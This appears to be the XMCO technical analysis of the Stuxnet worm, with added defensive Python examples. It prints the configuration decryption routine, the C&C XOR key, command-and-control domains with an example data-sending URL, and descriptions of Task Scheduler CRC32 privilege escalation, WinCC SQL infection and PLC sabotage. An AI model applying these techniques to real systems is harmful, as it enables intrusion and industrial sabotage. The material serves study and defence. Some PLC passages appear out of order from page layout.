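The two file-system side effects of the print-spooler vector described above (a spooler write outside its spool directory, and a file landing in the auto-compiled wbem\mof directory) are what a defender can detect. As an added example that is not from the original article, the following Python script runs two such rules over a constructed JSON-lines feed of file-create events in the spirit of an EDR or Sysmon export. The events, host name and timestamps are invented; the file names reuse those given in the text, and a default C:\Windows installation path is assumed (expand %SystemRoot% in a real deployment).

```python
import json

# Constructed sample telemetry: one JSON object per file-create event. These
# lines are made up for this example and do not come from any real incident.
SAMPLE_EVENTS = r"""
{"ts":"2010-09-14T10:02:11Z","host":"eng-ws-07","image":"C:\\Windows\\System32\\spoolsv.exe","target":"C:\\Windows\\System32\\spool\\PRINTERS\\00012.SPL"}
{"ts":"2010-09-14T10:02:13Z","host":"eng-ws-07","image":"C:\\Windows\\System32\\spoolsv.exe","target":"C:\\Windows\\System32\\winsta.exe"}
{"ts":"2010-09-14T10:02:13Z","host":"eng-ws-07","image":"C:\\Windows\\System32\\spoolsv.exe","target":"C:\\Windows\\System32\\wbem\\mof\\sysnullevnt.mof"}
{"ts":"2010-09-14T10:07:02Z","host":"eng-ws-07","image":"C:\\Windows\\System32\\msiexec.exe","target":"C:\\Windows\\System32\\drivers\\vendor.sys"}
"""

# Assumed default install location; a real detector expands %SystemRoot%.
SYSTEM32 = r"c:\windows\system32"
SPOOL_DIR = SYSTEM32 + r"\spool"
MOF_AUTOCOMPILE_DIR = SYSTEM32 + r"\wbem\mof"


def _under(path, directory):
    """True if path lies inside directory (case-insensitive, backslash paths)."""
    return path.lower().startswith(directory.lower() + "\\")


def evaluate(event):
    """Return the names of the rules an event trips; an empty list means benign."""
    image_name = event["image"].lower().rsplit("\\", 1)[-1]
    target = event["target"]
    hits = []
    # Rule 1: the spooler legitimately writes spool files under System32\spool;
    # a write anywhere else under System32 matches the "print to %System%" abuse.
    if (image_name == "spoolsv.exe" and _under(target, SYSTEM32)
            and not _under(target, SPOOL_DIR)):
        hits.append("spooler_write_outside_spool")
    # Rule 2: files dropped in wbem\mof are compiled by mofcomp.exe without any
    # user action, so a drop there is a persistence signal whoever wrote it.
    if _under(target, MOF_AUTOCOMPILE_DIR):
        hits.append("mof_autocompile_drop")
    return hits


def scan(feed):
    """Run both rules over a JSON-lines feed; return (ts, host, rule, target) alerts."""
    alerts = []
    for line in feed.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        for rule in evaluate(event):
            alerts.append((event["ts"], event["host"], rule, event["target"]))
    return alerts


if __name__ == "__main__":
    for ts, host, rule, target in scan(SAMPLE_EVENTS):
        print(f"{ts} {host} {rule}: {target}")
```

On the sample feed the first and last events are benign (a spool file, and an installer writing a driver), the winsta.exe write trips rule 1, and the MOF drop trips both rules; in practice the second rule is the cheaper one to deploy because it does not depend on which process did the writing.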
STUXNET PART II: TECHNICAL ANALYSIS                                                              ACTU SÉCU 27

Phase II: installation of the malware

The long-term installation of the malware requires certain actions that involve elevated privileges. The exploitation of the security vulnerabilities presented previously does not allow elevated privileges to be obtained. In order to ensure maximum dissemination, two security vulnerabilities are therefore exploited by Stuxnet in order to elevate its privileges once the system has been compromised.

These two vulnerabilities cover all existing versions of Windows. The first can locally elevate privileges on old versions of the operating system (Windows 2000 and XP), while the second can perform the same operation on more recent versions of the OS (Windows Vista, 7 and 2008).

The first vulnerability relates to the way the keyboard layout is managed by the driver "Win32k.sys". An index is loaded from a shared library without verification. This operation allows the malware to force the system's kernel to execute code controlled from the user area. This security vulnerability is described in detail in the article on page 29 and was corrected by Microsoft when it published its bulletin MS10-073, which added a check to prevent the use of an index that overflows the table of associated data.

The second vulnerability relates to the task scheduler. The definition of a task is stored in an ordinary XML file contained in the directory "%SystemRoot%\system32\Tasks". Access to this directory is restricted. Even so, an XML file (corresponding to a task) contained in it is accessible and can be written to by the user who added it. Secondly, the XML description file contains, among other things, information related to the execution of the task, for example the user and the required level of privileges. A user who defined a task can therefore freely change the identifier of the user and the level of privileges required, in order to elevate privileges.

To protect against this type of attack, Microsoft therefore introduced a "security feature" which calculates a hash of the file corresponding to a task when it is defined. This hash is checked before the task is executed. But the CRC32 algorithm used for calculating this hash is unfortunately not designed for security-related operations. It is too weak to fulfill this role because it is relatively easy to produce collisions. It is actually nothing more than a straightforward CRC calculation over the XML file. By adding data into a comment field, it is therefore easy to produce a valid file with the same hash as the original after it has been modified.

Stuxnet therefore adds a task, calculates the associated CRC32 hash, "manually" changes the file to raise the privileges associated with it, adds a comment field and fills it with random data to provoke a collision. The task is then executed with the highest privileges.

This security vulnerability was corrected by Microsoft when it published bulletin MS10-092, which changed the hash function used. The CRC-32 hash function was replaced by SHA-256. This algorithm is considered secure against collision attacks.

There remains an unknown factor. According to Microsoft, these two security vulnerabilities respectively targeted Windows XP and 2000 for the keyboard layout management, and Windows Vista, 7 and 2008 for the task scheduler. It would appear that the technique used by Stuxnet to install itself on Windows Server 2003 is unknown, or that the malware has excluded this platform from its targets.

Ludo Benoit
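The following Python is an added example written for this edit, not code from XMCO, from Microsoft or from Stuxnet. It reproduces, on a constructed task definition written in the Task Scheduler 2.0 XML schema, the defence that MS10-092 introduced: a SHA-256 digest of the task file is recorded when the task is registered and is checked again, together with the principal's UserId and RunLevel, before the task would run. The sample XML, the task name "demo" and the SIDs are constructed; the CRC32 used before MS10-092 is a linear checksum and is deliberately not used here.

```python
import hashlib
import xml.etree.ElementTree as ET

# Namespace of the Task Scheduler 2.0 XML schema used by the files in
# %SystemRoot%\system32\Tasks.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definition (not a file taken from Stuxnet or from a real system).
ORIGINAL_TASK = b"""<?xml version="1.0" encoding="UTF-8"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-21-1111111111-2222222222-3333333333-1001</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Tools\\updater.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

# The same file after the edit the article describes: the principal has been changed
# to SYSTEM (S-1-5-18) with the highest privileges, and a comment field has been appended.
TAMPERED_TASK = (
    ORIGINAL_TASK
    .replace(b"S-1-5-21-1111111111-2222222222-3333333333-1001", b"S-1-5-18")
    .replace(b"LeastPrivilege", b"HighestAvailable")
    .replace(b"</Task>", b"<!-- padding added in the comment field -->\n</Task>")
)


def principal_of(xml_bytes):
    """Return the UserId and RunLevel of the task's first <Principal>."""
    root = ET.fromstring(xml_bytes)
    node = root.find("t:Principals/t:Principal", NS)
    if node is None:
        raise ValueError("task definition has no <Principal>")
    return {
        "UserId": node.findtext("t:UserId", default="", namespaces=NS),
        "RunLevel": node.findtext("t:RunLevel", default="LeastPrivilege", namespaces=NS),
    }


def register_task(name, xml_bytes, baseline):
    """Record what was accepted at definition time, outside the user-writable Tasks directory.

    MS10-092 replaced the CRC32 integrity value with SHA-256: a CRC is linear and offers
    no resistance to a chosen modification, a cryptographic hash does.
    """
    baseline[name] = {
        "sha256": hashlib.sha256(xml_bytes).hexdigest(),
        "principal": principal_of(xml_bytes),
    }
    return baseline[name]


def audit_task(xml_bytes, entry):
    """Check a task file against its baseline entry before it runs. Returns (ok, findings)."""
    findings = []
    if hashlib.sha256(xml_bytes).hexdigest() != entry["sha256"]:
        findings.append("digest mismatch: file modified since registration")
    now = principal_of(xml_bytes)
    then = entry["principal"]
    if now["UserId"] != then["UserId"]:
        findings.append("UserId changed from %s to %s" % (then["UserId"], now["UserId"]))
    if now["RunLevel"] != then["RunLevel"]:
        findings.append("RunLevel changed from %s to %s" % (then["RunLevel"], now["RunLevel"]))
    return (not findings, findings)


if __name__ == "__main__":
    baseline = {}
    register_task("demo", ORIGINAL_TASK, baseline)
    print(audit_task(ORIGINAL_TASK, baseline["demo"]))  # (True, [])
    print(audit_task(TAMPERED_TASK, baseline["demo"]))  # (False, [three findings])
```

The digest alone already rejects the tampered file; the UserId and RunLevel comparison is kept separately because it tells an analyst what the modification was trying to obtain, which a bare hash mismatch does not.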
Functioning of the malware

The malware can be decomposed into several files. The main module, which takes the form of a DLL, is packed with UPX. This module is executed at the start of an attempt at compromise, whatever the vector (USB drive, network or SQL). As has previously been explained, the malware uses four zero-day Windows vulnerabilities to spread via different vectors (USB and local network). All of these techniques are used to install it on a system. In the most widespread case of infection, by opening a directory present on a USB drive, the exploitation of the LNK vulnerability launches execution of the main module.

Functionalities provided

Among other things, execution of this module launches a rootkit to hide the malicious files present on the USB drive. For this, certain system functions associated with the shared libraries "ntdll.dll" and "kernel32.dll" are intercepted so that code can be injected, and to hide the presence of various malicious files based on specific criteria (".lnk" files with a size of 1,471 bytes and "WTRabcd.tmp" files for which the sum of a, b, c and d modulo 10 is equal to 0).

The malware is capable of injecting executable code into running processes or into another process whose name corresponds to that of an antivirus program. These operations mean that it is not necessary to load a file that would risk being detected by an antivirus program.

Several other functionalities useful to the malware's proliferation have been added to it by its designers. Among these are functionalities allowing it to spread, hide itself and lastly to update itself. These correspond, overall, to the various functions (21) exported by Stuxnet's main module:

   Function 1: infect removable media and launch the RPC server;
   Function 2: intercept the calls to certain functions in order to infect .S7P and .MCP files corresponding to Step7 projects;
   Function 4: initiate the Stuxnet uninstallation procedure;
   Function 5: check that the rootkit (the kernel driver MrxCls.sys) is correctly installed;
   Functions 6 and 7: return the version of Stuxnet installed;
   Functions 9, 10 and 31 (13?): update the malware from Step7 files;
   Function 14: infect Step7 files;
   Function 15: point of entry for the system-infection routine;
   Function 16: infect the system (installation of drivers, DLLs, resources, code injection, etc.);
   Function 17: replace a Step 7 DLL so as to be able to intercept the calls to certain functions;
   Function 18: complete uninstallation of the malware;
   Function 19: infect a USB drive;
   Function 22: infect remote systems via the local network;
   Function 24: check the Internet connection;
   Function 27: RPC server;
   Function 28: dialogue with the command and control (C&C) server;
   Function 29: dialogue with the C&C server and execute the code returned;
   Function 32: RPC server used by the service server to respond to certain RPC calls.

Several network functionalities are implemented within the malware. Among these are the RPC client and server. P2P communications and the use of a C&C are mainly used to keep the malware up to date and to recover information. Nevertheless, these could be used to download and install other malware or to exfiltrate sensitive information stolen from the compromised system.
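As an added example that is not part of the original article, the following Python turns the two hiding criteria described above (".lnk" files of 1,471 bytes, and "WTRabcd.tmp" files whose four digits sum to 0 modulo 10), which the kernel driver "MrxNet.sys" applies again under Persistence, into a detection rule run over a directory listing. The listing and the file sizes of the .tmp entries are constructed; "~WTR4132.tmp" and "~WTR4141.tmp" are the two names the article cites, and both satisfy the digit rule.

```python
import re

# Hiding criteria from the article: .lnk files of exactly 1,471 bytes, and
# "WTRabcd.tmp" files whose four digits a, b, c, d sum to 0 modulo 10.
LNK_SIZE = 1471
WTR_NAME = re.compile(r"^~?WTR(\d)(\d)(\d)(\d)\.tmp$", re.IGNORECASE)


def matches_hiding_filter(name, size):
    """True when a directory entry would be hidden by the Stuxnet rootkit filter."""
    if name.lower().endswith(".lnk") and size == LNK_SIZE:
        return True
    m = WTR_NAME.match(name)
    return bool(m) and sum(int(d) for d in m.groups()) % 10 == 0


def scan_listing(entries):
    """Return the names in a (name, size) listing that match the filter."""
    return [name for name, size in entries if matches_hiding_filter(name, size)]


# Constructed listing of a removable drive: names and sizes were chosen for this
# example, except the two ~WTR names, which are the ones cited in the article.
SAMPLE_LISTING = [
    ("shortcut1.lnk", 1471),
    ("shortcut2.lnk", 1471),
    ("report.lnk", 2048),
    ("~WTR4132.tmp", 500000),
    ("~WTR4141.tmp", 26000),
    ("~WTR4133.tmp", 26000),   # digit sum 11: not hidden by the filter
    ("readme.txt", 120),
]

if __name__ == "__main__":
    for name in scan_listing(SAMPLE_LISTING):
        print("matches Stuxnet hiding filter:", name)
```

Because the very files this rule looks for are filtered out of directory listings on an infected host (by the user-mode hooks first, then by the kernel driver), the listing must come from outside the compromised system, for instance from the drive mounted on a clean machine or from a forensic image.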
Installation of an RPC server

The RPC server is subdivided into two components for managing local and remote RPC calls. For this, Stuxnet infects different processes according to the type of RPC call to be managed: "services.exe" for "local" calls, or one of the processes "netsvc", "rpcss" or "browser" for remote RPC calls. The various RPC methods are as follows:

   Method 1: returns the version of Stuxnet;
   Method 2: loads the module passed as a parameter in a new process and executes the specified exported function;
   Method 3: loads the module passed as a parameter into the memory space of the current process and calls the first exported function;
   Method 4: loads the module passed as a parameter into a new process and executes it;
   Method 5: creates a "dropper" and sends it to a compromised system;
   Method 6: executes the specified application;
   Method 7: reads the data from the specified file;
   Method 8: writes the data into the specified file;
   Method 9: deletes a file;
   Method 10: performs various tasks from the names of files intercepted using the "hooks" installed by "Method 2", and writes the information into a log file.

It appears that the last three methods implemented are not used by Stuxnet.

Thanks to this mechanism based on RPC, which can be used within the context of P2P communications, Stuxnet is, among other things, able to update itself on a local network from another compromised system.

C&C communications

The second functionality related to the network is a module for communicating with one of the command and control (C&C) servers. Like the "P2P over RPC" function, the module allows a compromised system to load malicious code into memory and execute it.

The list of command and control servers is specified in the configuration file "%WINDIR%\inf\mdmcpq3.pnf". This file of 1,860 bytes may be decrypted with the following function:

    # Decryption of the configuration file (Python). One XOR byte is derived
    # from the key and the byte counter, then applied to the encrypted byte "sym".
    def decrypt(key, counter, sym):
        v0 = key * counter
        v1 = v0 >> 0xb
        v1 = (v1 ^ v0) * 0x4e35
        v2 = v1 & 0xffff            # only the low 16 bits are kept from here on
        v3 = v2 * v2
        v4 = v3 >> 0xd
        v5 = v3 >> 0x17
        xorbyte = ((v5 & 0xff) + (v4 & 0xff)) & 0xff
        xorbyte = xorbyte ^ ((v2 >> 8) & 0xff)
        xorbyte = xorbyte ^ (v2 & 0xff)
        return xorbyte ^ sym

This file contains several items of information, such as the list of servers used to check the Internet connection ("www.windowsupdate.com", "www.msn.com"), the list of C&C servers ("www.mypremierfutbol.com", "www.todaysfutbol.com"), the dates and times of activation and deactivation of the worm, after which the worm installs itself automatically using the previously-mentioned functions, the version of the malware, the minimum number of files that a USB drive must contain to be able to be infected using malicious LNK files, and lastly, other ancillary information used for the correct functioning of the worm and its propagation.

Concerning the functioning mode of the C&C servers, an instance of Stuxnet does not exchange plaintext messages with the two previously-mentioned servers. Each of the messages sent over the Internet to the servers is encrypted using a very simple algorithm. This is a simple XOR with the following 31-byte key:

    // Encryption key (31 bytes)
    char Key[31] = { 0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6,
                     0xA4, 0x5D, 0xE2, 0x72, 0x66, 0xC0, 0x4A, 0x57,
                     0x88, 0x5A, 0xB0, 0x5C, 0x6E, 0x45, 0x56, 0x1A,
                     0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1 };

    // Encryption procedure: a repeating-key XOR applied in place.
    // Calling it a second time on the same buffer decrypts it.
    void EncryptData(char *Buffer, int BufferSize, char *Key)
    {
        for (int i = 0; i < BufferSize; i++)
            Buffer[i] ^= Key[i % 31];
        return;
    }
The structure of a message sent by the malware is quite complex. It contains much information specific to the victim, among which is information related to the network interfaces and the versions of the OS and of the malware. This message is simply sent in an HTTP GET request to one of the URLs listed in the configuration file, for example: http://www.mypremierfutbol.com/index.php?data=STUXNET_CC_MESSAGE.

In response to this request, the server returns a message composed of several items: a size coded over 4 bytes, a flag coded over 1 byte and lastly an executable image. If the size of the received message does not correspond to the indicated size of the image + 5 bytes, the malware ignores this response. If the size corresponds, the malware, according to the value of the flag, loads the executable image into the memory space of the current process or into another process using one of the dedicated RPC methods, then executes it.

It nevertheless appears that this important functionality has not really been used, neither to update the software nor to install additional malicious tools. It nevertheless acts as a backdoor. The rapid blocking of the domains www.mypremierfutbol.com and www.todaysfutbol.com perhaps had a role in this.

Seeking and infecting the WinCC environment

Lastly, to maximize the efficiency of the proliferation operation, the malware seeks the WinCC software. Once it is discovered, Stuxnet connects to the database used by the software, using a standard hard-coded password. Once connected to this database, the malware sends the malicious code via SQL requests, then executes it.

This first action compromises the MSSQL server. Then, the malware modifies the SQL views defined on the server to force the execution of code each time these views are accessed.

Stuxnet is at last capable of infecting WinCC / Step7 projects associated with WinCC Simatic Manager. The files that are sought and modified have the extensions .S7P, .MCP or .TMP. Under certain specific conditions, files with the names "xutils\listen\xr000000.mdx", "xutils\links\s7p00001.dbf" and "xutils\listen\s7000001.mdx" or "GracS\cc_alg.sav", "GracS\db_log.sav" and "GracS\cc_alg.sav" are deposited. In both cases, these files correspond respectively to an encrypted version of the malware's main DLL, to a data file of 90 bytes and lastly, to an encrypted version of Stuxnet's block of configuration data. Lastly, a specially-designed DLL is placed in the multiple sub-directories of the directory "hOmSave7".

The infection mechanism is relatively simple. When the project is opened using WinCC Simatic Manager, the DLL placed in the sub-directories of the directory "hOmSave7" is automatically sought. When this is loaded, the library decrypts the protected data and loads the malware's main component into memory to complete the process of infection.

Persistence

To ensure the persistence of the functionalities previously installed, Stuxnet nevertheless has to profoundly modify the system. This is because it is not possible to inject code into arbitrary processes or to sustainably hide files in the user area without profound modifications to the system.

Two system drivers signed with private keys corresponding to certificates belonging to Realtech and JMicron are therefore installed using the elevated privileges obtained from the two proofs of concept (Keyboard Layout and Task Scheduler). "MrxCls.sys" is used to inject code into a process. "MrxNet.sys" is a rootkit for hiding the malicious files used to exploit the LNK vulnerability. In contrast to the rootkit used in the user area, this one is persistent.

The fact that these drivers are signed with stolen certificates means that they can be installed more discreetly, so as not to arouse the user's suspicions (a signature is essential for installing drivers under Windows 7/Windows Vista). The ".lnk" files with a size of 1,471 bytes, and the "WTRabcd.tmp" files for which the sum of a, b, c and d modulo 10 is equal to 0, are filtered so that they are not displayed by the file explorer. This filter is active only for the file systems NTFS, FAT and CDFS. After being registered using the function "FileSystemRegistrationChange()", the driver is called each time a file system is mounted and can therefore monitor the requests that are sent to it. Thus, the driver can act with complete impunity and choose which files to display in a directory.
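The C&C exchange described under "C&C communications" and at the top of this page, as an added example that is not code from the article or from the malware: the 31-byte XOR key from the C listing encrypts a constructed beacon, a small analyst helper recovers the key from a captured message when enough plaintext is known, and a parser applies the length check the article describes to a server reply (4-byte size, 1-byte flag, image). The byte order of the size field is not given on the page and is assumed little-endian here; the reply is handled unencrypted, since the article only describes the outgoing messages as XORed; the beacon content and the reply image are constructed.

```python
import struct

# 31-byte XOR key reproduced from the C listing under "C&C communications".
KEY = bytes([0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6,
             0xA4, 0x5D, 0xE2, 0x72, 0x66, 0xC0, 0x4A, 0x57,
             0x88, 0x5A, 0xB0, 0x5C, 0x6E, 0x45, 0x56, 0x1A,
             0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1])


def xor_with_key(data, key=KEY):
    """Repeating-key XOR (Buffer[i] ^= Key[i % 31]); the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext, known_plaintext, key_len=31):
    """Analyst helper: with key_len bytes of known plaintext, a repeating XOR key falls out directly."""
    if len(known_plaintext) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of ciphertext and known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plaintext[:key_len]))


def build_cc_response(flag, image):
    """Server reply as described: 4-byte size, 1-byte flag, then the image (little-endian size assumed)."""
    return struct.pack("<IB", len(image), flag) + image


def parse_cc_response(payload):
    """Apply the length check the malware performs; return (flag, image) or None when the reply is rejected."""
    if len(payload) < 5:
        return None
    size, flag = struct.unpack_from("<IB", payload, 0)
    if len(payload) != size + 5:
        return None     # announced image size + 5 header bytes must equal the whole reply
    return flag, payload[5:]


# Constructed beacon; the real message carries network-interface, OS and version data.
BEACON = b"constructed beacon: os=5.1 mac=00:11:22:33:44:55 ver=1.0"

if __name__ == "__main__":
    wire = xor_with_key(BEACON)
    assert xor_with_key(wire) == BEACON
    print("recovered key matches:", recover_key(wire, BEACON) == KEY)
    reply = build_cc_response(1, b"MZ" + bytes(14))
    print(parse_cc_response(reply))            # (1, b'MZ' followed by 14 zero bytes)
    print(parse_cc_response(reply + b"\x00"))  # None: length does not match
```

The key-recovery helper is the reason a fixed repeating XOR key gives no confidentiality: a single captured beacon whose first 31 bytes are predictable (the message format is fixed) is enough to decode every other message to the same servers, which is also what makes this traffic easy to flag at a proxy once the key is known.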
1: The pirate manages to infect a USB drive used by a person working on a computer connected to the target information system.

2: The person uses their USB drive within the target information system's LAN.

3: After having infected a Windows workstation, Stuxnet seeks to spread across the LAN.

4: Stuxnet contacts its C&C server.

5: An employee whose USB drive has been contaminated connects to a workstation equipped with WinCC software and belonging to an industrial network.

6: When this contaminated workstation connects to a PLC, Stuxnet deposits the malicious code corresponding to PLC 0

7: The malicious code sends specific orders to the variable frequency drives.

7 bis: The person responsible for supervising the equipment cannot identify the presence of Stuxnet.
The resources embedded by Stuxnet

The two previously-mentioned drivers correspond respectively to resources 201 and 242 of the main module. Eleven other resources are also available, such as an executable PE module (210), an LNK link file (240), and a block of configuration data for the driver "MrxCls.sys" (205):

   Resource 201: driver "MrxNet.sys" signed using certificates belonging to RealTech or JMicron;
   Resource 202: DLL used in compromising Step 7 projects;
   Resource 203: CAB file containing an equivalent of resource 202 used for compromising WinCC projects;
   Resource 205: encrypted configuration-data file for the driver "MrxCls.sys";
   Resource 208: shared library "s70tbldx.dll" usurping the functions of the original Siemens DLL;
   Resource 209: file of 25 bytes containing encrypted data deposited in "%WINDIR%\help\winmic.fts";
   Resource 210: model of PE file used for creating or injecting executables ("~WTR4132.TMP");
   Resource 221: malicious code used for exploiting the security vulnerability present in the server service (MS08-067);
   Resource 222: malicious code used for exploiting the security vulnerability present in the print spooler (MS10-061);
   Resource 240: model LNK file;
   Resource 241: "~WTR4141.TMP", DLL used for loading the executable corresponding to resource 221 "~WTR4132.TMP", responsible for installing the malware (dropper);
   Resource 242: driver "Mrxnet.sys" (rootkit) used to mask the presence of certain files;
   Resource 250: malicious code used to exploit the security vulnerability present in the management of the keyboard layout (Keyboard Layout) (MS10-073).

The following exports were observed by Symantec in the older versions of Stuxnet, but have disappeared in the latest versions:

   Resource 207: information related to the exploitation of a vulnerability using Autorun.inf;
   Resource 231: resource used to check whether the system is connected to the Internet or not.

INFO

Definitions

PLC: Programmable Logic Controller. A programmable controller is a programmable electronic device for controlling industrial processes by sequential processing. It sends orders towards the preactuators (operative section, or operative section on the actuator side) from input data (sensors) (control section, or control section on the sensor side), instructions and a computer program.

SCADA: Supervisory Control And Data Acquisition (remote monitoring and data acquisition). Large-scale remote-control system for the real-time processing of a large number of remote measurements and for remotely controlling technical facilities. It is an industrial technology in the field of instrumentation.
Phase 3: Attack on industrial systems

Detection of SCADA systems based on WinCC

Once the Windows system has been compromised and the malware installed, the third phase of the attack can begin. This corresponds to the search for certain specific software. To access the SCADA system, the authors of the malware chose to go via the development tools associated with the target system: Step7 and WinCC. These two tools are respectively used to develop programs operating on PLC-type systems and to check their correct functioning. Incidentally, these tools are potentially the only point of entry to these sensitive systems, given that they are not supposed to be connected to the Internet, but rather to a network dedicated to them.

To carry out this third phase of the attack, the malware searches for and replaces the shared library "s7otbxdx.dll". This library, which comes from the Simatic software suite from Siemens, is used to have a PC running Windows communicate with a PLC of the Simatic family. Usually, a developer programs their equipment with one of the numerous programming languages interpreted by the software suite, such as STL or SCL. This is subsequently compiled into a specific assembler code called "MC7", before being loaded on the PLC.

By renaming the shared library "s7otbxdx.dll" as "s7otbxsx.dll", then by placing its own version of the library "s7otbxdx.dll", the malware is able to intercept all calls to the functions exported by the original library and to manipulate them at will. In fact, only the behavior of several functions is affected. Most of the calls to the functions of "s7otbxdx.dll" are directly forwarded to the equivalent functions in "s7otbxsx.dll".

The 16 functions whose behavior is altered correspond to the methods for reading ("s7blk_read"), writing ("s7blk_write"), enumeration ("s7blk_findfirst" and "s7blk_findnext") and deletion ("s7blk_delete") of the blocks of code present on the PLC. It is by modifying certain key functions of this library that the attackers ensure the sustainability and discretion of their attack. To avoid detection when an operator first connects to a compromised PLC, the "read" and "enumeration" functions hide certain blocks of code from the operator and only return the original "healthy" code.

But not all PLCs are targeted. Stuxnet, using two threads launched by the malicious library, searches for precisely two types of appliance with the references Siemens 6ES7-315-2 and 6ES7-417. The main difference between these two models of controller is the quantity of embedded memory: 256 KB for the S7-315 series against 30 MB for the S7-417 series.

Module 315

Next, in the configuration targeted by the malware, the PLCs of the 300 series (6ES7-315-2) must use between one and six Profibus CP 342-5 modules to communicate with the systems under their control. Once again, only certain identification numbers are sought. In the case of Stuxnet, these are the Profibus identification numbers "7050h" and "9500h". These numbers uniquely identify the models of these items of equipment, which are known as "frequency converter drives" or "variable frequency drives". The corresponding products are the "KFC750V3" manufactured by Fararo Paya based in Teheran in Iran, and the "Vacon NX" from Vacon based in Finland.
Variable frequency drives are generally used to control the speed of other components such as motors.

Finally, the last criterion sought is the presence of at least 33 variable frequency drives among the two models previously mentioned.

If these various extremely precise conditions are fulfilled, the process of infection begins with the modification of certain blocks of code such as DP_RECV, OB1 and OB35. These blocks of code are infected by overwriting or by increasing their sizes in order to introduce the malicious code at the beginning of the block. These operations ensure that the added code is executed when the block in question is called. The functions FC1865 and FC1874 are therefore respectively injected into blocks OB1 and OB35.

Note: DP_RECV corresponds to the function in charge of managing the reception of data on the bus. OB1 corresponds to the main function, which is continuously executed. OB35 corresponds to a timer executed every 100 ms.

In reality, Stuxnet may infect systems that correspond to its selection criteria in different ways. This is because two sequences of malicious code exist and

Subsequently, the system goes into a state machine clearly described by Symantec. The transition between each state is governed by timers, tests or by the end of other tasks. Approximately, the system collects data for a period of between 13 days and three months, before sending falsified data on the communication bus for about 50 min, then returning to the initial state.

According to Symantec's study, the system uses DP_RECV to inspect the messages sent by the variable frequency drives, which contain specific information corresponding to the current operating frequency. Lastly, this attack allows a pirate who has successfully injected their malicious code to withdraw the control that the legitimate blocks of code had on the data transmitted during the phase nicknamed "deadfoot" ("DEADF007" in the code). This phase corresponds to 50 min during which the PLC sends semi-arbitrary information to the various variable frequency drives through the Profibus modules. The messages sent correspond to frequencies that must be converted into rotation speeds by the variable frequency drives. Furthermore, execution of the legitimate code is prevented using a call to the command BEC (Conditional Block End) instead of letting the execution of the program continue. Without
may be used to infect a plc according to the distribution
of the products that are controlled. The first sequence,
referenced A by Symantec, is selected when there is a
majority of Vacon appliances. The second sequence,
referenced B by Symantec, is used when a majority of
Fararo Paya variable frequency drives are present.
In all cases: the module 315 is designed to allow a PLC
6ES7-315-2 to control up to six Profibus "masters" each
controlling 31 "slave" converters, each on their
dedicated Profibus network.
Finally, the attack 315, which corresponds to about
3,000 lines of STL code accompanied by 4 blocks of
data (DB888, DB889, DB890 and DB891), is organized
as follows:

    The code block DP _RECV is copied to the address
FC1869, then replaced by malicious code which itself
calls the original code that was moved.

  Each time a variable frequency drive sends data to a
PLC 6ES7-315-2 via the Profibus CP 342-5 module, its
                                                                                                                         WWW.XMCO.FR




data is transferred to the original code before being
reprocessed by the added malicious code.

  Each of the messages to be processed must be in a
specific format when it is examined by DP _RECV.
Namely, it must be composed of 31 records of 28 or 32
bytes corresponding to each of the converters.




                        This document is the property of XMCO Partners. Any reproduction is
                        strictly prohibited.                 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![23]
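The targeting criteria and DP_RECV message layout quoted above lend themselves to an inventory check. The following is an added example, not code from the article, from Symantec or from the malware: it encodes the published figures (identification numbers 7050h and 9500h, six masters of 31 slaves, the 33-drive threshold, the A/B majority rule and the 31 x 28/32-byte message format) so that a defender can test whether a plant's drive inventory matches the profile. The Drive record layout, the handling of an exact tie and the sample inventories are assumptions made for this illustration.

```python
"""
Inventory check against the "attack 315" profile described in the article.
Added illustration for defenders; figures come from the article, the data
layout, tie-breaking rule and sample inventories are assumptions.
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Profibus identification numbers quoted in the article.
IDENT_KFC750V3 = 0x7050   # Fararo Paya KFC750V3
IDENT_VACON_NX = 0x9500   # Vacon NX

# Topology limits quoted in the article: six masters, 31 slaves each.
MAX_MASTERS = 6
SLAVES_PER_MASTER = 31

# Minimum number of drives of the two models for the PLC to be a target.
MIN_MATCHING_DRIVES = 33

# DP_RECV message layout quoted in the article: 31 records of 28 or 32 bytes.
RECORDS_PER_MESSAGE = 31
RECORD_SIZES = (28, 32)


@dataclass(frozen=True)
class Drive:
    """One slave on a Profibus segment (record layout assumed for this example)."""
    master: int   # index of the Profibus master it hangs off, 0..5
    ident: int    # Profibus identification number of the device


def check_topology(drives: List[Drive]) -> None:
    """Reject inventories that exceed six masters of 31 slaves each."""
    for d in drives:
        if not 0 <= d.master < MAX_MASTERS:
            raise ValueError(f"master index {d.master} out of range")
    for m in range(MAX_MASTERS):
        count = sum(1 for d in drives if d.master == m)
        if count > SLAVES_PER_MASTER:
            raise ValueError(f"master {m} has {count} slaves, max {SLAVES_PER_MASTER}")


def select_sequence(drives: Iterable[Drive]) -> Optional[str]:
    """Return 'A', 'B' or None following the rules given in the article:
    fewer than 33 drives of the two models -> not targeted (None);
    a Vacon majority -> sequence A; a Fararo Paya majority -> sequence B.
    An exact tie is not covered by the article; treating it as
    'not targeted' is an assumption of this illustration."""
    drives = list(drives)
    check_topology(drives)
    vacon = sum(1 for d in drives if d.ident == IDENT_VACON_NX)
    fararo = sum(1 for d in drives if d.ident == IDENT_KFC750V3)
    if vacon + fararo < MIN_MATCHING_DRIVES:
        return None
    if vacon > fararo:
        return "A"
    if fararo > vacon:
        return "B"
    return None


def split_dp_recv_message(msg: bytes) -> List[bytes]:
    """Split a DP_RECV message into its 31 per-converter records, or raise
    ValueError when the length is neither 31 x 28 nor 31 x 32 bytes."""
    for size in RECORD_SIZES:
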